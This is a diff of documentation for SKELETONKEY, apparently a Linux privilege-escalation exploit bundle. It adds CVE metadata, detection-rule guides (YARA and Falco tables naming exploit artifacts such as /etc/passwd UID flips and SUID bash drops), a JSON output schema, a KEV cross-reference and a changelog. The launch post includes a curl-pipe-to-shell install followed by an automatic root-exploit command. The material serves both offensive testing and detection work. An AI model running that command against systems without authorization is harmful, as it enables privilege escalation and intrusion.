+    "kev_date_added": "2022-04-25"
+  },
+  {
+    "cve": "CVE-2022-25636",
+    "module_dir": "nft_fwd_dup_cve_2022_25636",
+    "cwe": "CWE-269",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2022-2588",
+    "module_dir": "cls_route4_cve_2022_2588",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-0179",
+    "module_dir": "nft_payload_cve_2023_0179",
+    "cwe": "CWE-190",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-0386",
+    "module_dir": "overlayfs_setuid_cve_2023_0386",
+    "cwe": "CWE-282",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2025-06-17"
+  },
+  {
+    "cve": "CVE-2023-0458",
+    "module_dir": "entrybleed_cve_2023_0458",
+    "cwe": "CWE-476",
+    "attack_technique": "T1082",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-2008",
+    "module_dir": "vmwgfx_cve_2023_2008",
+    "cwe": "CWE-129",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-22809",
+    "module_dir": "sudoedit_editor_cve_2023_22809",
+    "cwe": "CWE-269",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-32233",
+    "module_dir": "nft_set_uaf_cve_2023_32233",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-3269",
+    "module_dir": "stackrot_cve_2023_3269",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2023-4622",
+    "module_dir": "af_unix_gc_cve_2023_4622",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2024-1086",
+    "module_dir": "nf_tables_cve_2024_1086",
+    "cwe": "CWE-416",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": true,
+    "kev_date_added": "2024-05-30"
+  },
+  {
+    "cve": "CVE-2026-31635",
+    "module_dir": "dirtydecrypt_cve_2026_31635",
+    "cwe": "CWE-130",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2026-41651",
+    "module_dir": "pack2theroot_cve_2026_41651",
+    "cwe": "CWE-367",
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  },
+  {
+    "cve": "CVE-2026-46300",
+    "module_dir": "fragnesia_cve_2026_46300",
+    "cwe": null,
+    "attack_technique": "T1068",
+    "attack_subtechnique": null,
+    "in_kev": false,
+    "kev_date_added": ""
+  }
+]
@@ -41,12 +41,23 @@ make it part of your daily ops" guide.
 # Daily/weekly hygiene check
 sudo skeletonkey --scan

+# Investigate a specific finding (one-page operator briefing)
+sudo skeletonkey --explain nf_tables    # whichever module came back VULNERABLE
+# Shows: CVE / CWE / MITRE ATT&CK / CISA KEV status, live detect() trace,
+# OPSEC footprint (what an exploit would leave behind), detection-rule
+# coverage, mitigation. Paste into the triage ticket.
+
 # If anything's VULNERABLE, deploy detections + apply mitigation
 sudo skeletonkey --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules
 sudo augenrules --load
 sudo skeletonkey --mitigate copy_fail   # or whichever module fired
 ```

+The `--explain` output is also useful as a learning artifact: each
+module's `--explain` block is a self-contained CVE briefing with the
+reasoning chain the detect() function walked, so analysts can verify
+SKELETONKEY's verdict against their own understanding of the bug.
+
 ### Small fleet (~10-100 hosts, SSH-reachable)

 Use `tools/skeletonkey-fleet-scan.sh`:
@@ -168,6 +179,70 @@ skeletonkey --detect-rules --format=sigma > /etc/sigma/skeletonkey.yml
 sigmac -t elastic /etc/sigma/skeletonkey.yml
 ```

+### YARA artifact scanning
+
+YARA rules catch the **post-fire** state — page-cache shellcode
+overwrites, malicious `.deb` drops, `/etc/passwd` UID flips. Run them
+as a scheduled scan against sensitive paths:
+
+```bash
+# Ship YARA rules
+sudo skeletonkey --detect-rules --format=yara | sudo tee /etc/yara/skeletonkey.yar
+
+# Scheduled scan via cron — catches the page-cache and /tmp artifacts
+# /etc/cron.d/skeletonkey-yara
+*/15 * * * * root yara -r /etc/yara/skeletonkey.yar \
+                       /etc/passwd /tmp /usr/bin/su /usr/bin/passwd \
+                       2>>/var/log/skeletonkey-yara.log
+```
+
+What each rule catches:
+
+| Rule | Triggers on |
+|---|---|
+| `etc_passwd_uid_flip` | Non-root user line in `/etc/passwd` with a zero-padded UID (`0000+`). Canonical Copy Fail / Dirty Frag / Dirty Pipe / DirtyDecrypt outcome. |
+| `etc_passwd_root_no_password` | `root` line with empty password field — DirtyDecrypt's intermediate corruption step. |
+| `pwnkit_gconv_modules_cache` | Small `gconv-modules` text file with a `module UTF-8// X// /tmp/…` redefinition. |
+| `dirty_pipe_passwd_uid_flip` | Same UID-flip pattern (Dirty Pipe-specific tag). |
+| `dirtydecrypt_payload_overlay` | First 28 bytes of `/usr/bin/su` (or similar) match the embedded 120-byte ET_DYN shellcode the V12 PoC overlays. |
+| `fragnesia_payload_overlay` | Same shape for the 192-byte Fragnesia payload. |
+| `pack2theroot_malicious_deb` | `.deb` ar-archive in `/tmp` with the SUID-bash postinst. |
+| `pack2theroot_suid_bash_drop` | `/tmp/.suid_bash` exists and is a real bash ELF. |
+
+The page-cache overlay rules (`dirtydecrypt_payload_overlay`,
+`fragnesia_payload_overlay`) are particularly high-signal: no
+legitimate ELF starts with those exact 28 bytes, so a hit means the
+exploit landed.
+
+### Falco runtime detection
+
+Falco catches the exploit **as it fires** by hooking syscalls and
+namespace events. Best deploy for K8s / container hosts but works on
+any modern Linux:
+
+```bash
+sudo skeletonkey --detect-rules --format=falco \
+    | sudo tee /etc/falco/rules.d/skeletonkey.yaml
+sudo falco --validate /etc/falco/rules.d/skeletonkey.yaml
+sudo systemctl reload falco   # or restart, depending on distro
+```
+
+What each rule catches:
+
+| Rule | Triggers on |
+|---|---|
+| `Pwnkit-style pkexec invocation` | `pkexec` spawned with empty argv (the bug's hallmark). |
+| `Pwnkit-style GCONV_PATH injection` | Non-root sets `GCONV_PATH=` / `CHARSET=` before spawning a setuid binary. |
+| `AF_ALG authenc keyblob installed by non-root` | `socket(AF_ALG)` by non-root — Copy Fail / GCM variant primitive. |
+| `XFRM NETLINK_XFRM bind from unprivileged userns` | XFRM SA setup from non-root userns — Dirty Frag / Fragnesia primitive. |
+| `/etc/passwd modified by non-root` | Post-fire signal for the whole page-cache-write family. |
+| `Dirty Pipe splice from setuid/sensitive file by non-root` | `splice()` of `/etc/passwd` or `/usr/bin/su` by non-root. |
+| `AF_RXRPC socket created by non-root` | DirtyDecrypt primitive — `socket(AF_RXRPC)` is nearly unheard-of in production. |
+| `rxrpc security key added` | `add_key("rxrpc", …)` by non-root — DirtyDecrypt handshake setup. |
+| `TCP_ULP=espintcp set by non-root` | Fragnesia trigger — flipping a TCP socket to espintcp ULP. |
+| `SUID bash dropped to /tmp` | Pack2TheRoot postinst landing `/tmp/.suid_bash`. |
+| `dpkg invoked by PackageKit on behalf of non-root caller` | Pack2TheRoot chain — `packagekitd → dpkg` installing a /tmp `.pk-*.deb`. |
+
 ## Day-to-day operational shape

 ### What "good" looks like in the SIEM
@@ -245,6 +320,96 @@ sudo rm /etc/sysctl.d/99-dirtyfail-mitigations.conf
 # Reload affected modules / sysctls per your distro
 ```

+## Per-module detection coverage
+
+Across the 4 rule formats:
+
+| Module | CVE | auditd | sigma | yara | falco |
+|---|---|:-:|:-:|:-:|:-:|
+| copy_fail | CVE-2026-31431 | ✓ | ✓ | ✓ | ✓ |
+| copy_fail_gcm | (variant) | ✓ | ✓ | ✓ | ✓ |
+| dirty_frag_esp | CVE-2026-43284 | ✓ | ✓ | ✓ | ✓ |
+| dirty_frag_esp6 | CVE-2026-43284 | ✓ | ✓ | ✓ | ✓ |
+| dirty_frag_rxrpc | CVE-2026-43500 | ✓ | ✓ | ✓ | ✓ |
+| dirty_pipe | CVE-2022-0847 | ✓ | ✓ | ✓ | ✓ |
+| dirtydecrypt | CVE-2026-31635 | ✓ | ✓ | ✓ | ✓ |
+| fragnesia | CVE-2026-46300 | ✓ | ✓ | ✓ | ✓ |
+| pwnkit | CVE-2021-4034 | ✓ | ✓ | ✓ | ✓ |
+| pack2theroot | CVE-2026-41651 | ✓ | ✓ | ✓ | ✓ |
+| Other 21 modules | various | ✓ | partial | — | — |
+
+Full 4-format coverage on the 10 highest-value modules; auditd
+covers everything. YARA / Falco expansion to the remaining 21 modules
+is incremental contributor work (each module's `detect_yara` /
+`detect_falco` field in the module struct just needs a string).
+
+## Correlation across formats
+
+Single-format detections are useful; the high-confidence signal is
+the **correlation across formats** for the same module in a short
+window. Each exploit leaves a recognisable multi-format trail:
+
+| Exploit | falco fires | auditd fires | yara confirms |
+|---|---|---|---|
+| Pwnkit | `pkexec` empty argv | `execve /usr/bin/pkexec` + `GCONV_PATH=` env | gconv-modules cache in /tmp |
+| Dirty Pipe | `splice()` from `/etc/passwd` | splice + write to `/etc/passwd` | UID flip in `/etc/passwd` |
+| Copy Fail | `socket(AF_ALG)` | algif_aead + `ALG_SET_KEY` | UID flip in `/etc/passwd` |
+| Dirty Frag (ESP) | NETLINK_XFRM sendto + TCP_ULP | XFRM_MSG_NEWSA | UID flip in `/etc/passwd` |
+| DirtyDecrypt | `socket(AF_RXRPC)` + `add_key(rxrpc)` | AF_RXRPC + add_key | 120-byte ELF overwrites `/usr/bin/su` |
+| Fragnesia | `TCP_ULP=espintcp` from non-root | XFRM + setsockopt(TCP_ULP) | 192-byte ELF overwrites `/usr/bin/su` |
+| Pack2TheRoot | dpkg invoked by packagekitd with /tmp/.pk-*.deb | new `.deb` in `/tmp` + `chmod 4755` on `/tmp/.suid_bash` | malicious `.deb` + SUID bash both present |
+
+If **three of the four signals** fire for the same module in the same
+window, the exploit landed. **One signal alone** in a noisy
+environment is more likely a tuning FP; **three signals** is incident
+response.
+
+## Worked example: catching DirtyDecrypt end-to-end
+
+A SOC operator gets a Falco page:
+
+```
+CRITICAL  AF_RXRPC socket() by non-root  (user=alice proc=poc pid=44231)
+```
+
+1. **Confirm via auditd** — pull events keyed on the family:
+   ```bash
+   sudo ausearch -k skeletonkey-dirtydecrypt-rxrpc -ts recent
+   ```
+   Expect: `socket(...,33,...)` + subsequent `add_key("rxrpc",...)`.
+
+2. **Confirm via yara** — scan setuid binaries for the page-cache
+   overlay:
+   ```bash
+   yara /etc/yara/skeletonkey.yar /usr/bin/su /usr/bin/passwd
+   ```
+   If `dirtydecrypt_payload_overlay` matches `/usr/bin/su`, **the
+   exploit landed** — the binary's page cache has been overwritten
+   with the 120-byte shellcode.
+
+3. **Recover** — the on-disk binary is intact; only the page cache is
+   corrupted. Drop it:
+   ```bash
+   sudo skeletonkey --cleanup dirtydecrypt   # or: echo 3 > /proc/sys/vm/drop_caches
+   ```
+
+4. **Sigma hunt for lateral / repeat** — query your SIEM with the
+   sigma rule ID `7c1e9a40-skeletonkey-dirtydecrypt` over the last 7
+   days to find any other hosts.
+
+5. **Patch.** DirtyDecrypt's mainline fix is commit `a2567217` in
+   Linux 7.0 — see [`CVES.md`](../CVES.md) for distro backports.
+
+6. **Harden.** `rxrpc` is rarely needed on non-AFS hosts:
+   ```bash
+   echo "blacklist rxrpc" | sudo tee /etc/modprobe.d/blacklist-rxrpc.conf
+   sudo update-initramfs -u
+   ```
+
+The same shape applies to every module: pick the auditd key, the
+yara rule for the artifact, the falco rule for the runtime signal,
+and the sigma rule for the hunt.
+
 ## Common false positives + tuning

 | Rule key | False positive | Fix |
@@ -0,0 +1,139 @@
+# SKELETONKEY JSON output schema
+
+`skeletonkey --scan --json` (and `--auto --json`, planned) emit a
+single JSON object on **stdout**. All human-readable banner lines and
+per-module log chatter go to **stderr** in JSON mode — pipes to SIEMs
+and fleet aggregators get a clean machine-parseable document on
+stdout while operators still see diagnostics on stderr.
+
+This document is the contract for that JSON. SKELETONKEY treats it
+as a stability commitment: new fields may appear in future releases,
+but existing field names and value types do not change without a
+major-version bump.
+
+## Top-level object
+
+```json
+{
+  "version": "0.6.0",
+  "modules": [ /* ... per-module entries ... */ ]
+}
+```
+
+| Field      | Type     | Stability  | Meaning |
+|------------|----------|------------|---------|
+| `version`  | string   | stable     | The SKELETONKEY release that produced this document. Semver-ish (`MAJOR.MINOR.PATCH`). Consumers may use it to correlate with the corpus inventory in [`CVES.md`](../CVES.md). |
+| `modules`  | array    | stable     | One entry per registered module, emitted in the order the dispatcher's `--list` reports them. Length grows monotonically as new modules land. |
+
+## Per-module entry
+
+```json
+{
+  "name":   "dirty_pipe",
+  "cve":    "CVE-2022-0847",
+  "result": "OK"
+}
+```
+
+| Field    | Type   | Stability | Meaning |
+|----------|--------|-----------|---------|
+| `name`   | string | stable    | The module's CLI identifier — what you pass to `--exploit <name>`. Lowercase, ASCII, `_`-delimited. Never changes for a given module across releases. |
+| `cve`    | string | stable    | The CVE identifier (`CVE-YYYY-NNNNN`), or `"VARIANT"` for sibling variants without their own CVE (e.g. `copy_fail_gcm`), or `"-"` for primitives like `entrybleed` that have a CVE-less role. |
+| `result` | string | stable    | One of the `result` enum values below. |
+
+## `result` enum
+
+| Value          | Exit code | Meaning |
+|----------------|-----------|---------|
+| `OK`           | 0         | Module's `detect()` ran successfully. Host is **patched** for this CVE, or the bug class is not applicable here (predates the introduction, wrong arch, etc.). Safe to ignore for this host. |
+| `TEST_ERROR`   | 1         | `detect()` could not decide — the host fingerprint is missing data, the version parser failed, or an internal probe errored. Treat as "no information; check manually." |
+| `VULNERABLE`   | 2         | Host is **vulnerable** to this CVE per the module's detect logic (version-based and/or empirical active probe). `--exploit <name> --i-know` will attempt to land root. |
+| `EXPLOIT_FAIL` | 3         | Only ever returned by `--exploit`, never by `--scan`. Exploit was attempted but did not land root. Diagnostic context goes to stderr. |
+| `PRECOND_FAIL` | 4         | A documented precondition is not met on this host — examples: unprivileged user namespaces disabled, AppArmor restriction on, sudo not installed, AF_RXRPC unavailable. The bug may exist on the kernel but the carrier path here is closed. |
+| `EXPLOIT_OK`   | 5         | Only ever returned by `--exploit` / `--auto`. Root was achieved; for `--auto` mode this is the process exit code that drove the dispatcher into a root shell. |
+
+## Process exit code semantics for `--scan`
+
+The process exit code is the **worst (highest) result code** observed
+across all modules. This lets a SIEM treat the binary's exit code as
+a single-host alert level without re-parsing JSON:
+
+| Exit code | Interpretation                                      |
+|-----------|-----------------------------------------------------|
+| 0         | All modules `OK`. Host is patched for the corpus.   |
+| 1         | At least one module returned `TEST_ERROR`. Investigate. |
+| 2         | At least one module returned `VULNERABLE`. Patch the host. |
+| 4         | At least one module returned `PRECOND_FAIL` (and none worse). Host has reduced attack surface but is not necessarily safe. |
+
+(Process exit codes 3 and 5 are exclusive to the `--exploit` /
+`--auto` modes and never appear in `--scan` output.)
+
+## Example: invoking + parsing
+
+```bash
+# capture pure JSON
+skeletonkey --scan --json --no-color > host-$(hostname).json 2> /dev/null
+
+# any vulnerable modules?
+jq -e '.modules[] | select(.result == "VULNERABLE") | .name' host-*.json
+
+# fleet roll-up — modules vulnerable across the fleet, by frequency
+jq -s 'map(.modules[] | select(.result == "VULNERABLE") | .name)
+       | flatten | group_by(.) | map({mod: .[0], count: length})
+       | sort_by(-.count)' host-*.json
+```
+
+`jq -e` exits non-zero when its selector matches nothing, giving the
+fleet runner a per-host "any-vulnerable" boolean without parsing the
+document.
+
+## Stability promises
+
+**Stable across non-major releases:**
+
+- Field names listed in the tables above (`version`, `modules`, `name`,
+  `cve`, `result`).
+- The `result` enum string set. New result strings cannot appear
+  without a major version bump.
+- The `modules` array containing exactly one entry per registered
+  module.
+- Exit-code semantics for `--scan`.
+
+**May change without notice:**
+
+- The `modules` array length, ordering, and contents (new modules are
+  added regularly; ordering follows registration order which is
+  stable per release but not a contract).
+- Whitespace / formatting of the JSON itself (consumers MUST parse,
+  not regex).
+- Field values for `cve` (a stub variant could gain a real CVE later).
+
+**May be added in future minor versions:**
+
+- New per-module fields (e.g. `family`, `summary`, `safety_rank`,
+  `kernel_range`). Consumers MUST ignore unknown fields.
+- New top-level fields (e.g. `host_fingerprint`, `scan_started_at`,
+  `schema_version`). Consumers MUST ignore unknown fields.
+- A `--scan --active --json` output may grow per-probe verdict
+  metadata under a new `probe` sub-object.
+
+## Recommended consumer pattern
+
+```python
+import json, subprocess, sys
+
+doc = json.loads(subprocess.check_output(
+    ["skeletonkey", "--scan", "--json", "--no-color"],
+    stderr=subprocess.DEVNULL,
+))
+
+assert doc["version"], "missing top-level version"
+for mod in doc["modules"]:
+    assert mod["name"] and mod["cve"] and mod["result"], \
+        f"malformed module entry: {mod!r}"
+    if mod["result"] == "VULNERABLE":
+        print(f"{mod['name']} ({mod['cve']}): VULNERABLE", file=sys.stderr)
+```
+
+Ignore unknown fields. Match `result` against the enum, but treat
+unknown strings as `TEST_ERROR`-equivalent (forward-compat).
@@ -0,0 +1,47 @@
+# CISA KEV Cross-Reference
+
+Which SKELETONKEY modules cover CVEs that CISA has observed exploited
+in the wild per the Known Exploited Vulnerabilities catalog.
+Refreshed via `tools/refresh-cve-metadata.py`.
+
+**10 of 26 modules cover KEV-listed CVEs.**
+
+## In KEV (prioritize patching)
+
+| CVE | Date added to KEV | CWE | Module |
+| --- | --- | --- | --- |
+| CVE-2019-13272 | 2021-12-10 | ? | `ptrace_traceme_cve_2019_13272` |
+| CVE-2016-5195 | 2022-03-03 | CWE-362 | `dirty_cow_cve_2016_5195` |
+| CVE-2021-3156 | 2022-04-06 | CWE-193 | `sudo_samedit_cve_2021_3156` |
+| CVE-2022-0847 | 2022-04-25 | CWE-665 | `dirty_pipe_cve_2022_0847` |
+| CVE-2021-4034 | 2022-06-27 | CWE-787 | `pwnkit_cve_2021_4034` |
+| CVE-2021-3493 | 2022-10-20 | CWE-270 | `overlayfs_cve_2021_3493` |
+| CVE-2024-1086 | 2024-05-30 | CWE-416 | `nf_tables_cve_2024_1086` |
+| CVE-2022-0185 | 2024-08-21 | CWE-190 | `fuse_legacy_cve_2022_0185` |
+| CVE-2023-0386 | 2025-06-17 | CWE-282 | `overlayfs_setuid_cve_2023_0386` |
+| CVE-2021-22555 | 2025-10-06 | CWE-787 | `netfilter_xtcompat_cve_2021_22555` |
+
+## Not in KEV
+
+Not observed exploited per CISA — but several have public PoC code
+and are technically reachable. "Not in KEV" is not the same as
+"safe to ignore".
+
+| CVE | CWE | Module |
+| --- | --- | --- |
+| CVE-2017-7308 | CWE-681 | `af_packet_cve_2017_7308` |
+| CVE-2020-14386 | CWE-250 | `af_packet2_cve_2020_14386` |
+| CVE-2021-33909 | CWE-190 | `sequoia_cve_2021_33909` |
+| CVE-2022-0492 | CWE-287 | `cgroup_release_agent_cve_2022_0492` |
+| CVE-2022-25636 | CWE-269 | `nft_fwd_dup_cve_2022_25636` |
+| CVE-2022-2588 | CWE-416 | `cls_route4_cve_2022_2588` |
+| CVE-2023-0179 | CWE-190 | `nft_payload_cve_2023_0179` |
+| CVE-2023-0458 | CWE-476 | `entrybleed_cve_2023_0458` |
+| CVE-2023-2008 | CWE-129 | `vmwgfx_cve_2023_2008` |
+| CVE-2023-22809 | CWE-269 | `sudoedit_editor_cve_2023_22809` |
+| CVE-2023-32233 | CWE-416 | `nft_set_uaf_cve_2023_32233` |
+| CVE-2023-3269 | CWE-416 | `stackrot_cve_2023_3269` |
+| CVE-2023-4622 | CWE-416 | `af_unix_gc_cve_2023_4622` |
+| CVE-2026-31635 | CWE-130 | `dirtydecrypt_cve_2026_31635` |
+| CVE-2026-41651 | CWE-367 | `pack2theroot_cve_2026_41651` |
+| CVE-2026-46300 | ? | `fragnesia_cve_2026_46300` |
@@ -0,0 +1,102 @@
+# SKELETONKEY — launch post
+
+> Copy-pasteable for HN, lobste.rs, mastodon, blog. ~600 words.
+
+---
+
+## SKELETONKEY: a curated Linux LPE corpus with detection rules baked in
+
+The Linux privilege-escalation space is fragmented. Single-CVE PoC
+repos go stale within months. `linux-exploit-suggester` tells you
+what *might* work but doesn't run anything. `auto-root-exploit` and
+`kernelpop` bundle exploits but ship no detection signatures and
+haven't been maintained in years.
+
+**SKELETONKEY** is one curated binary that:
+
+1. Fingerprints the host's kernel / distro / sudo / userland.
+2. Reports which of 28 bundled CVEs that host is still vulnerable
+   to — covering 2016 through 2026.
+3. With explicit `--i-know` authorization, runs the safest one and
+   gets you root.
+4. Ships matching **auditd + sigma rules** for every CVE so blue
+   teams get the same coverage when they deploy it.
+
+### One command
+
+```bash
+curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
+  && skeletonkey --auto --i-know
+```
+
+`--auto` ranks vulnerable modules by **exploit safety** —
+structural escapes (no kernel state touched) first, then page-cache
+writes, then userspace cred-races, then kernel primitives, then
+kernel races last — and runs the safest match. If it fails it falls
+back gracefully and tells you the next candidates to try manually.
+
+### What's in the corpus
+
+- **Userspace LPE**: pwnkit (CVE-2021-4034), sudo Baron Samedit
+  (CVE-2021-3156), sudoedit EDITOR escape (CVE-2023-22809)
+- **Page-cache writes**: dirty_pipe (CVE-2022-0847), dirty_cow
+  (CVE-2016-5195), copy_fail family (CVE-2026-31431, 43284, 43500)
+- **Container/namespace**: cgroup_release_agent (CVE-2022-0492),
+  overlayfs (CVE-2021-3493), overlayfs_setuid (CVE-2023-0386),
+  fuse_legacy (CVE-2022-0185)
+- **Kernel primitives**: netfilter (4 CVEs from 2022→2024),
+  af_packet (CVE-2017-7308, CVE-2020-14386), cls_route4
+  (CVE-2022-2588), netfilter_xtcompat (CVE-2021-22555)
+- **Kernel races**: stackrot (CVE-2023-3269), af_unix_gc
+  (CVE-2023-4622), Sequoia (CVE-2021-33909)
+- **Side channels**: EntryBleed kbase leak (CVE-2023-0458)
+- **Graphics**: vmwgfx DRM OOB (CVE-2023-2008)
+- **Userspace classic**: PTRACE_TRACEME (CVE-2019-13272)
+
+Full inventory at
+[CVES.md](https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md).
+
+### The verified-vs-claimed bar
+
+Most public PoC repos hardcode offsets for one kernel build and
+silently break elsewhere. SKELETONKEY refuses to ship fabricated
+offsets. Modules with a kernel primitive but no per-kernel
+cred-overwrite chain default to firing the primitive + grooming the
+slab + recording an empirical witness, then return
+`EXPLOIT_FAIL` honestly. The opt-in `--full-chain` engages the
+shared `modprobe_path` finisher with sentinel-arbitrated success
+(it only claims root when a setuid bash actually materializes).
+
+When `--full-chain` needs kernel offsets, you populate them once on
+a target kernel via `skeletonkey --dump-offsets` (parses
+`/proc/kallsyms` or `/boot/System.map`) and either set env vars or
+upstream the entry to `core/offsets.c kernel_table[]` via PR.
+
+### For each side of the house
+
+- **Red team**: stop curating broken PoCs. One tested binary, fresh
+  releases, honest scope reporting.
+- **Sysadmins**: one command, no SaaS, JSON output for CI gates.
+  Fleet-scan tool included.
+- **Blue team**: `skeletonkey --detect-rules --format=auditd | sudo
+  tee /etc/audit/rules.d/99-skeletonkey.rules` and you have coverage
+  for every CVE in the bundle. Sigma + YARA + Falco output also
+  supported.
+
+### Status + roadmap
+
+v0.5.0 today: 28 modules, all build clean on Debian 13 / kernel
+6.12, all refuse-on-patched verified. The embedded offset table is
+empty — operator-populated. Next: empirical validation on a
+multi-distro vuln-kernel VM matrix, then offset-table community
+seeding for common cloud builds.
+
+MIT. Each module credits the original CVE reporter and PoC author
+in its `NOTICE.md`. The research credit belongs to the people who
+found the bugs; SKELETONKEY is the bundling layer.
+
+**Repo:** https://github.com/KaraZajac/SKELETONKEY
+**Release:** https://github.com/KaraZajac/SKELETONKEY/releases/latest
+
+Authorized testing only. Read [docs/ETHICS.md](ETHICS.md) before you
+point this at anything you don't own.
@@ -0,0 +1,448 @@
+## SKELETONKEY v0.9.3 — CVE metadata refresh + dirtydecrypt range fix
+
+**CVE metadata refresh (10 → 12 KEV).** Populated the 8 missing
+entries in `core/cve_metadata.c` for v0.8.0 + v0.9.0 module additions.
+Two of them are CISA-KEV-listed:
+
+- **CVE-2018-14634** `mutagen_astronomy` — KEV-listed 2026-01-26 (CWE-190)
+- **CVE-2025-32463** `sudo_chwoot` — KEV-listed 2025-09-29 (CWE-829)
+
+Other 6 entries got CWE / ATT&CK technique metadata so `--explain` and
+`--module-info` now surface WEAKNESS + THREAT INTEL correctly for them.
+(`tools/refresh-cve-metadata.py` hangs on CISA's HTTP/2 endpoint via
+Python urlopen — populated directly via curl + max-time as a workaround.)
+
+**dirtydecrypt module bug fix.** Auditing dirtydecrypt's range table
+against NVD's authoritative CPE match for CVE-2026-31635 surfaced that
+`dd_detect()` was wrongly gating "predates the bug" on kernel < 7.0.
+Per NVD, the rxgk RESPONSE bug entered at 6.16.1 stable; vulnerable
+ranges are 6.16.1–6.18.22, 6.19.0–6.19.12, and 7.0-rc1..rc7. The fix:
+
+- `dd_detect()` predates-gate now uses 6.16.1 (not 7.0)
+- `patched_branches[]` table adds `{6, 18, 23}` for the 6.18 backport
+
+Re-verified empirically: dirtydecrypt now correctly returns VULNERABLE
+on mainline 6.19.7 (genuinely below the 6.19.13 backport). Previously
+it returned OK there — a false negative that would have lied to anyone
+running scan on a real vulnerable kernel.
+
+---
+
+## SKELETONKEY v0.9.2 — dirtydecrypt verified on mainline 6.19.7
+
+One more empirical verification: **CVE-2026-31635 dirtydecrypt** confirmed
+end-to-end on Ubuntu 22.04 + mainline 6.19.7. detect() correctly returns
+OK ("kernel predates the rxgk RESPONSE-handling code added in 7.0"). Footer
+goes 27 → 28.
+
+Attempted but deferred: **CVE-2026-46300 fragnesia**. Mainline 7.0.5 kernel
+.debs depend on `libssl3t64` / `libelf1t64` (the t64-transition libs
+introduced in Ubuntu 24.04 / Debian 13). No Vagrant box with a Parallels
+provider has those libs yet — `dpkg --force-depends` leaves the kernel
+package in `iHR` (broken) state with no `/boot/vmlinuz` deposited. Marked
+`manual: true` with rationale in `targets.yaml`. Resolvable when a
+Parallels-supported ubuntu2404 / debian13 box becomes available.
+
+---
+
+## SKELETONKEY v0.9.1 — VM verification sweep (22 → 27)
+
+Five more CVEs empirically confirmed end-to-end against real Linux VMs
+via `tools/verify-vm/`:
+
+| CVE | Module | Target environment |
+|---|---|---|
+| CVE-2019-14287 | `sudo_runas_neg1` | Ubuntu 18.04 (sudo 1.8.21p2 + `(ALL,!root)` grant via provisioner) |
+| CVE-2020-29661 | `tioscpgrp`      | Ubuntu 20.04 pinned to `5.4.0-26` (genuinely below the 5.4.85 backport) |
+| CVE-2024-26581 | `nft_pipapo`     | Ubuntu 22.04 + mainline `5.15.5` (below the 5.15.149 fix) |
+| CVE-2025-32463 | `sudo_chwoot`    | Ubuntu 22.04 + sudo `1.9.16p1` built from upstream into `/usr/local/bin` |
+| CVE-2025-6019  | `udisks_libblockdev` | Debian 12 + `udisks2` 2.9.4 + polkit allow rule for the verifier user |
+
+Footer goes from `22 empirically verified` → `27 empirically verified`.
+
+### Verifier infrastructure (the why)
+
+These verifications required real plumbing work that didn't exist before:
+
+- **Per-module provisioner hook** (`tools/verify-vm/provisioners/<module>.sh`)
+  — per-target setup that doesn't belong in the Vagrantfile (build sudo
+  from source, install udisks2 + polkit rule, drop a sudoers grant) now
+  lives in checked-in scripts that re-run idempotently on every verify.
+- **Two-phase provisioning** in `verify.sh` — prep provisioners run
+  first (install kernel, set grub default, drop polkit rule), then a
+  conditional reboot if `uname -r` doesn't match the target, then the
+  verifier proper. Fixes the silent-fail where the new kernel was
+  installed but the VM never actually rebooted into it.
+- **GRUB_DEFAULT pin in both `pin-kernel` and `pin-mainline` blocks** —
+  without this, grub's debian-version-compare picks the highest-sorting
+  vmlinuz as default; for downgrades (stock 4.15 → mainline 4.14.70, or
+  stock 5.4.0-169 → pinned 5.4.0-26) the wrong kernel won boot.
+- **Old-mainline URL fallback** — kernel.ubuntu.com puts ≤ 4.15 mainline
+  debs at `/v${KVER}/` not `/v${KVER}/amd64/`. Fallback handles both.
+
+### Honest residuals — 7 of 34 still unverified
+
+| Module | Why not verified |
+|---|---|
+| `vmwgfx` | needs a VMware guest; we're on Parallels |
+| `dirty_cow` | needs ≤ 4.4 kernel — older than any supported Vagrant box |
+| `mutagen_astronomy` | mainline 4.14.70 kernel-panics on Ubuntu 18.04 rootfs (`Failed to execute /init (error -8)` — kernel config mismatch). Genuinely needs CentOS 6 / Debian 7. |
+| `pintheft` | needs RDS kernel module loaded (Arch only autoloads it) |
+| `vsock_uaf` | needs `vsock_loopback` loaded — not autoloaded on common Vagrant boxes |
+| `dirtydecrypt`, `fragnesia` | need Linux 7.0 — not yet shipping as any distro kernel |
+
+All seven are flagged in `tools/verify-vm/targets.yaml` with `manual: true`
+and a rationale.
+
+---
+
+## SKELETONKEY v0.9.0 — every year 2016 → 2026 now covered
+
+Five gap-filling modules. Closes the 2018 hole entirely and thickens
+2019 / 2020 / 2024.
+
